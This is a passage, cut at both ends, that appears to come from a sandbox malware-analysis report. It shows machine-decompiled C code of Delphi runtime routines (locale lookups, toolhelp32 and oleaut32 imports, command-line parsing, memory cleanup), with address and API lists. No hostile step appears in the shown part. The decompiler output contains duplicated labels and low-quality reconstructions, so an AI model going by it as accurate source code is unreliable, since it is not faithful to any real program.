									_push(_t83 + 1);
									_push(_v8);
									_push( &_v595);
									L00401248();
									while( *_t93 != 0) {
										_t90 = E00404DF4(_t93 + 1);
										_t45 = _t90 - _t93;
										if(_t45 + _t83 + 1 <= 0x105) {
											_push(_t45 + 1);
											_push(_t93);
											_push( &(( &_v595)[_t83]));
											L00401248();
											_t94 = FindFirstFileA( &_v595,  &_v334);
											if(_t94 != 0xffffffff) {
												FindClose(_t94);
												_t54 =  &(_v334.cFileName);
												_push(_t54);
												L00401250();
												if(_t54 + _t83 + 1 + 1 <= 0x105) {
													 *((char*)(_t96 + _t83 - 0x24f)) = 0x5c;
													_push(0x105 - _t83 - 1);
													_push( &(_v334.cFileName));
													_push( &(( &(( &_v595)[_t83]))[1]));
													L00401248();
													_t64 =  &(_v334.cFileName);
													_push(_t64);
													L00401250();
													_t83 = _t83 + _t64 + 1;
													_t93 = _t90;
													continue;
												}
											}
										}
										goto L17;
									}
									_push(_v12);
									_push( &_v595);
									_push(_v8);
									L00401248();
								}
							}
						}
					}
				} else {
					_t84 = GetProcAddress(_t91, "GetLongPathNameA");
					if(_t84 == 0) {
						goto L4;
					} else {
						_push(0x105);
						_push( &_v595);
						_push(_v8);
						if( *_t84() == 0) {
							goto L4;
						} else {
							_push(_v12);
							_push( &_v595);
							_push(_v8);
							L00401248();
						}
					}
				}
				L17:
				return _v16;
			}



















    0x00404e14
    0x00404e17
    0x00404e1d
    0x00404e2a
    0x00404e2e
    0x00404e70
    0x00404e76
    0x00404eb3
    0x00000000
    0x00404e78
    0x00404e7f
    0x00404e90
    0x00404e95
    0x00404e9b
    0x00404ea3
    0x00404ea8
    0x00404eb6
    0x00404eb8
    0x00404ebe
    0x00404ec2
    0x00404ec9
    0x00404eca
    0x00404f75
    0x00404edc
    0x00404ee0
    0x00404eed
    0x00404ef4
    0x00404ef5
    0x00404efe
    0x00404eff
    0x00404f17
    0x00404f1c
    0x00404f1f
    0x00404f24
    0x00404f2a
    0x00404f2b
    0x00404f3b
    0x00404f3d
    0x00404f4d
    0x00404f54
    0x00404f5e
    0x00404f5f
    0x00404f64
    0x00404f6a
    0x00404f6b
    0x00404f71
    0x00404f73
    0x00000000
    0x00404f73
    0x00404f3b
    0x00404f1c
    0x00000000
    0x00404eed
    0x00404f81
    0x00404f88
    0x00404f8c
    0x00404f8d
    0x00404f8d
    0x00404ea8
    0x00404e95
    0x00404e7f
    0x00404e30
    0x00404e3b
    0x00404e3f
    0x00000000
    0x00404e41
    0x00404e41
    0x00404e4c
    0x00404e50
    0x00404e55
    0x00000000
    0x00404e57
    0x00404e5a
    0x00404e61
    0x00404e65
    0x00404e66
    0x00404e66
    0x00404e55
    0x00404e3f
    0x00404f92
    0x00404f9b

    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00404E25
    • GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00404E36
    • lstrcpyn.KERNEL32(?,?,?,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00404E66
    • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00404ECA
      • Part of subcall function 00404DF4: CharNextA.USER32(?), ref: 00404DF7
    • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001), ref: 00404EFF
    • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5), ref: 00404F12
    • FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000), ref: 00404F1F
    • lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068), ref: 00404F2B
    • lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B), ref: 00404F5F
    • lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8), ref: 00404F6B
    • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00404F8D
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    Function 0040B2B4, Relevance: 3.0, APIs: 2, Instructions: 37
    C-Code - Quality: 46%
    			E0040B2B4(int __eax, void* __ebx, void* __eflags) {
				char _v11;
				char _v16;
				intOrPtr _t28;
				void* _t31;
				void* _t33;

				_t33 = __eflags;
				_v16 = 0;
				_push(_t31);
				_push(0x40b318);
				_push( *[fs:edx]);
				 *[fs:edx] = _t31 + 0xfffffff4;
				GetLocaleInfoA(__eax, 0x1004,  &_v11, 7);
				E004040F8( &_v16, 7,  &_v11);
				_push(_v16);
				E00407174(7, GetACP(), _t33);
				_pop(_t28);
				 *[fs:eax] = _t28;
				_push(E0040B31F);
				return E00403E88( &_v16);
			}








    0x0040b2b4
    0x0040b2bd
    0x0040b2c2
    0x0040b2c3
    0x0040b2c8
    0x0040b2cb
    0x0040b2da
    0x0040b2ea
    0x0040b2f2
    0x0040b2fb
    0x0040b304
    0x0040b307
    0x0040b30a
    0x0040b317

    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0040B318), ref: 0040B2DA
    • GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,0040B318), ref: 0040B2F3
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    Function 0040587A, Relevance: 1.5, APIs: 1, Instructions: 38
    C-Code - Quality: 51%
    			E0040587A(int __eax, void* __ebx, void* __eflags) {
				char _v8;
				char _v15;
				char _v20;
				intOrPtr _t29;
				void* _t32;

				_v20 = 0;
				_push(_t32);
				_push(0x4058e2);
				_push( *[fs:edx]);
				 *[fs:edx] = _t32 + 0xfffffff0;
				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
				E004040F8( &_v20, 7,  &_v15);
				E00402B80(_v20,  &_v8);
				if(_v8 != 0) {
				}
				_pop(_t29);
				 *[fs:eax] = _t29;
				_push(E004058E9);
				return E00403E88( &_v20);
			}








    0x00405885
    0x0040588a
    0x0040588b
    0x00405890
    0x00405893
    0x004058a2
    0x004058b2
    0x004058bd
    0x004058c8
    0x004058c8
    0x004058ce
    0x004058d1
    0x004058d4
    0x004058e1

    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    Function 0040587C, Relevance: 1.5, APIs: 1, Instructions: 37
    C-Code - Quality: 51%
    			E0040587C(int __eax, void* __ebx, void* __eflags) {
				char _v8;
				char _v15;
				char _v20;
				intOrPtr _t29;
				void* _t32;

				_v20 = 0;
				_push(_t32);
				_push(0x4058e2);
				_push( *[fs:edx]);
				 *[fs:edx] = _t32 + 0xfffffff0;
				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
				E004040F8( &_v20, 7,  &_v15);
				E00402B80(_v20,  &_v8);
				if(_v8 != 0) {
				}
				_pop(_t29);
				 *[fs:eax] = _t29;
				_push(E004058E9);
				return E00403E88( &_v20);
			}








    0x00405885
    0x0040588a
    0x0040588b
    0x00405890
    0x00405893
    0x004058a2
    0x004058b2
    0x004058bd
    0x004058c8
    0x004058c8
    0x004058ce
    0x004058d1
    0x004058d4
    0x004058e1

    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    Function 00409DB0, Relevance: 1.5, APIs: 1, Instructions: 29
    C-Code - Quality: 100%
    			E00409DB0(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
				char _v260;
				intOrPtr _t10;
				void* _t18;

				_t18 = __ecx;
				_t10 = _a4;
				if(GetLocaleInfoA(__eax, __edx,  &_v260, 0x100) <= 0) {
					return E00403EDC(_t10, _t18);
				}
				return E00403F78(_t10, _t5 - 1,  &_v260);
			}






    0x00409dbb
    0x00409dbd
    0x00409dd5
    0x00000000
    0x00409ded
    0x00000000

    APIs
    • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    Function 00409DFC, Relevance: 1.5, APIs: 1, Instructions: 23
    C-Code - Quality: 79%
    			E00409DFC(int __eax, char __ecx, int __edx) {
				char _v16;
				char _t5;
				char _t6;

				_push(__ecx);
				_t6 = __ecx;
				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
					_t5 = _t6;
				} else {
					_t5 = _v16;
				}
				return _t5;
			}






    0x00409dff
    0x00409e00
    0x00409e16
    0x00409e1d
    0x00409e18
    0x00409e18
    0x00409e18
    0x00409e23

    APIs
    • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040B5C6,00000000,0040B7DF,?,?,00000000,00000000), ref: 00409E0F
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    Function 00417A70, Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99
    C-Code - Quality: 100%
    			E00417A70() {

				if( *0x454a18 == 0) {
					 *0x454a18 = GetModuleHandleA("kernel32.dll");
					if( *0x454a18 != 0) {
						 *0x454a1c = GetProcAddress( *0x454a18, "CreateToolhelp32Snapshot");
						 *0x454a20 = GetProcAddress( *0x454a18, "Heap32ListFirst");
						 *0x454a24 = GetProcAddress( *0x454a18, "Heap32ListNext");
						 *0x454a28 = GetProcAddress( *0x454a18, "Heap32First");
						 *0x454a2c = GetProcAddress( *0x454a18, "Heap32Next");
						 *0x454a30 = GetProcAddress( *0x454a18, "Toolhelp32ReadProcessMemory");
						 *0x454a34 = GetProcAddress( *0x454a18, "Process32First");
						 *0x454a38 = GetProcAddress( *0x454a18, "Process32Next");
						 *0x454a3c = GetProcAddress( *0x454a18, "Process32FirstW");
						 *0x454a40 = GetProcAddress( *0x454a18, "Process32NextW");
						 *0x454a44 = GetProcAddress( *0x454a18, "Thread32First");
						 *0x454a48 = GetProcAddress( *0x454a18, "Thread32Next");
						 *0x454a4c = GetProcAddress( *0x454a18, "Module32First");
						 *0x454a50 = GetProcAddress( *0x454a18, "Module32Next");
						 *0x454a54 = GetProcAddress( *0x454a18, "Module32FirstW");
						 *0x454a58 = GetProcAddress( *0x454a18, "Module32NextW");
					}
				}
				if( *0x454a18 == 0 ||  *0x454a1c == 0) {
					return 0;
				} else {
					return 1;
				}
			}



    0x00417a79
    0x00417a89
    0x00417a8e
    0x00417aa1
    0x00417ab3
    0x00417ac5
    0x00417ad7
    0x00417ae9
    0x00417afb
    0x00417b0d
    0x00417b1f
    0x00417b31
    0x00417b43
    0x00417b55
    0x00417b67
    0x00417b79
    0x00417b8b
    0x00417b9d
    0x00417baf
    0x00417baf
    0x00417a8e
    0x00417bb7
    0x00417bc5
    0x00417bc6
    0x00417bc9
    0x00417bc9

    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389,?,?,?,?,?,004183C2,00000000,004183DD), ref: 00417A84
    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389,?,?,?,?,?,004183C2), ref: 00417A9C
    • GetProcAddress.KERNEL32(00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AAE
    • GetProcAddress.KERNEL32(00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AC0
    • GetProcAddress.KERNEL32(00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AD2
    • GetProcAddress.KERNEL32(00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7), ref: 00417AE4
    • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000), ref: 00417AF6
    • GetProcAddress.KERNEL32(00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002), ref: 00417B08
    • GetProcAddress.KERNEL32(00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot), ref: 00417B1A
    • GetProcAddress.KERNEL32(00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst), ref: 00417B2C
    • GetProcAddress.KERNEL32(00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext), ref: 00417B3E
    • GetProcAddress.KERNEL32(00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First), ref: 00417B50
    • GetProcAddress.KERNEL32(00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next), ref: 00417B62
    • GetProcAddress.KERNEL32(00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory), ref: 00417B74
    • GetProcAddress.KERNEL32(00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First), ref: 00417B86
    • GetProcAddress.KERNEL32(00000000,Module32FirstW,00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next), ref: 00417B98
    • GetProcAddress.KERNEL32(00000000,Module32NextW,00000000,Module32FirstW,00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW), ref: 00417BAA
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    Function 0040CA40, Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141
    C-Code - Quality: 100%
    			E0040CA40() {
				struct HINSTANCE__* _v8;
				intOrPtr _t46;
				void* _t91;

				_v8 = GetModuleHandleA("oleaut32.dll");
				 *0x4547a0 = E0040CA14("VariantChangeTypeEx", E0040C5B0, _t91);
				 *0x4547a4 = E0040CA14("VarNeg", E0040C5E0, _t91);
				 *0x4547a8 = E0040CA14("VarNot", E0040C5E0, _t91);
				 *0x4547ac = E0040CA14("VarAdd", E0040C5EC, _t91);
				 *0x4547b0 = E0040CA14("VarSub", E0040C5EC, _t91);
				 *0x4547b4 = E0040CA14("VarMul", E0040C5EC, _t91);
				 *0x4547b8 = E0040CA14("VarDiv", E0040C5EC, _t91);
				 *0x4547bc = E0040CA14("VarIdiv", E0040C5EC, _t91);
				 *0x4547c0 = E0040CA14("VarMod", E0040C5EC, _t91);
				 *0x4547c4 = E0040CA14("VarAnd", E0040C5EC, _t91);
				 *0x4547c8 = E0040CA14("VarOr", E0040C5EC, _t91);
				 *0x4547cc = E0040CA14("VarXor", E0040C5EC, _t91);
				 *0x4547d0 = E0040CA14("VarCmp", E0040C5F8, _t91);
				 *0x4547d4 = E0040CA14("VarI4FromStr", E0040C604, _t91);
				 *0x4547d8 = E0040CA14("VarR4FromStr", E0040C670, _t91);
				 *0x4547dc = E0040CA14("VarR8FromStr", E0040C6DC, _t91);
				 *0x4547e0 = E0040CA14("VarDateFromStr", E0040C748, _t91);
				 *0x4547e4 = E0040CA14("VarCyFromStr", E0040C7B4, _t91);
				 *0x4547e8 = E0040CA14("VarBoolFromStr", E0040C820, _t91);
				 *0x4547ec = E0040CA14("VarBstrFromCy", E0040C8A0, _t91);
				 *0x4547f0 = E0040CA14("VarBstrFromDate", E0040C910, _t91);
				_t46 = E0040CA14("VarBstrFromBool", E0040C980, _t91);
				 *0x4547f4 = _t46;
				return _t46;
			}






    0x0040ca4e
    0x0040ca62
    0x0040ca78
    0x0040ca8e
    0x0040caa4
    0x0040caba
    0x0040cad0
    0x0040cae6
    0x0040cafc
    0x0040cb12
    0x0040cb28
    0x0040cb3e
    0x0040cb54
    0x0040cb6a
    0x0040cb80
    0x0040cb96
    0x0040cbac
    0x0040cbc2
    0x0040cbd8
    0x0040cbee
    0x0040cc04
    0x0040cc1a
    0x0040cc2a
    0x0040cc30
    0x0040cc37

    APIs
    • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0040CA49
      • Part of subcall function 0040CA14: GetProcAddress.KERNEL32(00000000), ref: 0040CA2D
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    Function 00402858, Relevance: 16.6, APIs: 9, Strings: 2, Instructions: 109
    C-Code - Quality: 100%
    			E00402858(CHAR* __eax, intOrPtr* __edx) {
				char _t5;
				char _t6;
				CHAR* _t7;
				char _t9;
				CHAR* _t11;
				char _t14;
				CHAR* _t15;
				char _t17;
				CHAR* _t19;
				CHAR* _t22;
				CHAR* _t23;
				CHAR* _t32;
				intOrPtr _t33;
				intOrPtr* _t34;
				void* _t35;
				void* _t36;

				_t34 = __edx;
				_t22 = __eax;
				while(1) {
					L2:
					_t5 =  *_t22;
					if(_t5 != 0 && _t5 <= 0x20) {
						_t22 = CharNextA(_t22);
					}
					L2:
					_t5 =  *_t22;
					if(_t5 != 0 && _t5 <= 0x20) {
						_t22 = CharNextA(_t22);
					}
					L4:
					if( *_t22 != 0x22 || _t22[1] != 0x22) {
						_t36 = 0;
						_t32 = _t22;
						while(1) {
							_t6 =  *_t22;
							if(_t6 <= 0x20) {
								break;
							}
							if(_t6 != 0x22) {
								_t7 = CharNextA(_t22);
								_t36 = _t36 + _t7 - _t22;
								_t22 = _t7;
								continue;
							}
							_t22 = CharNextA(_t22);
							while(1) {
								_t9 =  *_t22;
								if(_t9 == 0 || _t9 == 0x22) {
									break;
								}
								_t11 = CharNextA(_t22);
								_t36 = _t36 + _t11 - _t22;
								_t22 = _t11;
							}
							if( *_t22 != 0) {
								_t22 = CharNextA(_t22);
							}
						}
						E00404478(_t34, _t36);
						_t23 = _t32;
						_t33 =  *_t34;
						_t35 = 0;
						while(1) {
							_t14 =  *_t23;
							if(_t14 <= 0x20) {
								break;
							}
							if(_t14 != 0x22) {
								_t15 = CharNextA(_t23);
								if(_t15 <= _t23) {
									continue;
								} else {
									goto L27;
								}
								do {
									L27:
									 *((char*)(_t33 + _t35)) =  *_t23;
									_t23 =  &(_t23[1]);
									_t35 = _t35 + 1;
								} while (_t15 > _t23);
								continue;
							}
							_t23 = CharNextA(_t23);
							while(1) {
								_t17 =  *_t23;
								if(_t17 == 0 || _t17 == 0x22) {
									break;
								}
								_t19 = CharNextA(_t23);
								if(_t19 <= _t23) {
									continue;
								} else {
									goto L21;
								}
								do {
									L21:
									 *((char*)(_t33 + _t35)) =  *_t23;
									_t23 =  &(_t23[1]);
									_t35 = _t35 + 1;
								} while (_t19 > _t23);
							}
							if( *_t23 != 0) {
								_t23 = CharNextA(_t23);
							}
						}
						return _t23;
					} else {
						_t22 =  &(_t22[2]);
						continue;
					}
				}
			}



















    0x0040285c
    0x0040285e
    0x0040286a
    0x0040286a
    0x0040286a
    0x0040286e
    0x00402868
    0x00402868
    0x0040286a
    0x0040286a
    0x0040286e
    0x00402868
    0x00402868
    0x00402874
    0x00402877
    0x00402884
    0x00402886
    0x004028cd
    0x004028cd
    0x004028d1
    0x00000000
    0x00000000
    0x0040288c
    0x004028c0
    0x004028c9
    0x004028cb
    0x00000000
    0x004028cb
    0x00402894
    0x004028a6
    0x004028a6
    0x004028aa
    0x00000000
    0x00000000
    0x00402899
    0x004028a2
    0x004028a4
    0x004028a4
    0x004028b3
    0x004028bb
    0x004028bb
    0x004028b3
    0x004028d7
    0x004028dc
    0x004028de
    0x004028e0
    0x00402935
    0x00402935
    0x00402939
    0x00000000
    0x00000000
    0x004028e6
    0x00402921
    0x00402928
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0040292a
    0x0040292a
    0x0040292c
    0x0040292f
    0x00402930
    0x00402931
    0x00000000
    0x0040292a
    0x004028ee
    0x00402907
    0x00402907
    0x0040290b
    0x00000000
    0x00000000
    0x004028f3
    0x004028fa
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004028fc
    0x004028fc
    0x004028fe
    0x00402901
    0x00402902
    0x00402903
    0x004028fc
    0x00402914
    0x0040291c
    0x0040291c
    0x00402914
    0x00402941
    0x0040287f
    0x0040287f
    0x00000000
    0x0040287f
    0x00402877

    APIs
    • CharNextA.USER32(00000000), ref: 00402863
    • CharNextA.USER32(00000000), ref: 0040288F
    • CharNextA.USER32(00000000), ref: 00402899
    • CharNextA.USER32(00000000), ref: 004028B6
    • CharNextA.USER32(00000000), ref: 004028C0
    • CharNextA.USER32(00000000), ref: 004028E9
    • CharNextA.USER32(00000000), ref: 004028F3
    • CharNextA.USER32(00000000), ref: 00402917
    • CharNextA.USER32(00000000), ref: 00402921
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    Function 0040A4A4, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 56
    C-Code - Quality: 100%
    			E0040A4A4(void* __edx, void* __edi, void* __fp0) {
				void _v1024;
				char _v1088;
				long _v1092;
				void* _t12;
				char* _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				intOrPtr _t24;
				long _t32;

				E0040A31C(_t12,  &_v1024, __edx, __fp0, 0x400);
				_t14 =  *0x45308c; // 0x454044
				if( *_t14 == 0) {
					_t16 =  *0x452f6c; // 0x405f30
					_t9 = _t16 + 4; // 0xffe9
					_t18 =  *0x454660; // 0x400000
					LoadStringA(E00404DCC(_t18),  *_t9,  &_v1088, 0x40);
					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
				}
				_t24 =  *0x452f90; // 0x454214
				E00402784(E00402A8C(_t24));
				CharToOemA( &_v1024,  &_v1024);
				_t32 = E00407764( &_v1024, __edi);
				WriteFile(GetStdHandle(0xfffffff4),  &_v1024, _t32,  &_v1092, 0);
				return WriteFile(GetStdHandle(0xfffffff4), 0x40a568, 2,  &_v1092, 0);
			}












    0x0040a4b3
    0x0040a4b8
    0x0040a4c0
    0x0040a527
    0x0040a52c
    0x0040a530
    0x0040a53b
    0x00000000
    0x0040a551
    0x0040a4c2
    0x0040a4cc
    0x0040a4db
    0x0040a4eb
    0x0040a4fe
    0x00000000

    APIs
      • Part of subcall function 0040A31C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
      • Part of subcall function 0040A31C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
      • Part of subcall function 0040A31C: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
      • Part of subcall function 0040A31C: LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    • CharToOemA.USER32(?,?), ref: 0040A4DB
    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0040A4F8
    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?), ref: 0040A4FE
    • GetStdHandle.KERNEL32(000000F4,0040A568,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040A513
    • WriteFile.KERNEL32(00000000,000000F4,0040A568,00000002,?), ref: 0040A519
    • LoadStringA.USER32(00000000,0000FFE9,?,00000040), ref: 0040A53B
    • MessageBoxA.USER32(00000000,?,?,00002010), ref: 0040A551
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    Function 00401A74, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 62
    C-Code - Quality: 72%
    			E00401A74() {
				void* _t2;
				void* _t3;
				void* _t14;
				intOrPtr* _t19;
				intOrPtr _t23;
				intOrPtr _t26;
				intOrPtr _t28;

				_t26 = _t28;
				if( *0x4545bc == 0) {
					return _t2;
				} else {
					_push(_t26);
					_push(E00401B4A);
					_push( *[fs:edx]);
					 *[fs:edx] = _t28;
					if( *0x454045 != 0) {
						_push(0x4545c4);
						L0040130C();
					}
					 *0x4545bc = 0;
					_t3 =  *0x45461c; // 0x0
					LocalFree(_t3);
					 *0x45461c = 0;
					_t19 =  *0x4545e4; // 0x4545e4
					while(_t19 != 0x4545e4) {
						_t1 = _t19 + 8; // 0x0
						VirtualFree( *_t1, 0, 0x8000);
						_t19 =  *_t19;
					}
					E00401374(0x4545e4);
					E00401374(0x4545f4);
					E00401374(0x454620);
					_t14 =  *0x4545dc; // 0x0
					while(_t14 != 0) {
						 *0x4545dc =  *_t14;
						LocalFree(_t14);
						_t14 =  *0x4545dc; // 0x0
					}
					_pop(_t23);
					 *[fs:eax] = _t23;
					_push(0x401b51);
					if( *0x454045 != 0) {
						_push(0x4545c4);
						L00401314();
					}
					_push(0x4545c4);
					L0040131C();
					return 0;
				}
			}










    0x00401a75
    0x00401a7f
    0x00401b53
    0x00401a85
    0x00401a87
    0x00401a88
    0x00401a8d
    0x00401a90
    0x00401a9a
    0x00401a9c
    0x00401aa1
    0x00401aa1
    0x00401aa6
    0x00401aad
    0x00401ab3
    0x00401aba
    0x00401abf
    0x00401ad9
    0x00401ace
    0x00401ad2
    0x00401ad7
    0x00401ad7
    0x00401ae6
    0x00401af0
    0x00401afa
    0x00401aff
    0x00401b06
    0x00401b0a
    0x00401b11
    0x00401b16
    0x00401b1b
    0x00401b21
    0x00401b24
    0x00401b27
    0x00401b33
    0x00401b35
    0x00401b3a
    0x00401b3a
    0x00401b3f
    0x00401b44
    0x00401b49
    0x00401b49

    APIs
    • RtlEnterCriticalSection.KERNEL32(004545C4,00000000,00401B4A), ref: 00401AA1
    • LocalFree.KERNEL32(00000000,00000000,00401B4A), ref: 00401AB3
    • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00401B4A), ref: 00401AD2
    • LocalFree.KERNEL32(00000000,00000000,00000000,00008000,00000000,00000000,00401B4A), ref: 00401B11
    • RtlLeaveCriticalSection.KERNEL32(004545C4,00401B51,00000000,00000000,00401B4A), ref: 00401B3A
    • RtlDeleteCriticalSection.KERNEL32(004545C4,00401B51,00000000,00000000,00401B4A), ref: 00401B44
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    Function 0040B514, Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201
    C-Code - Quality: 72%
    			E0040B514(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
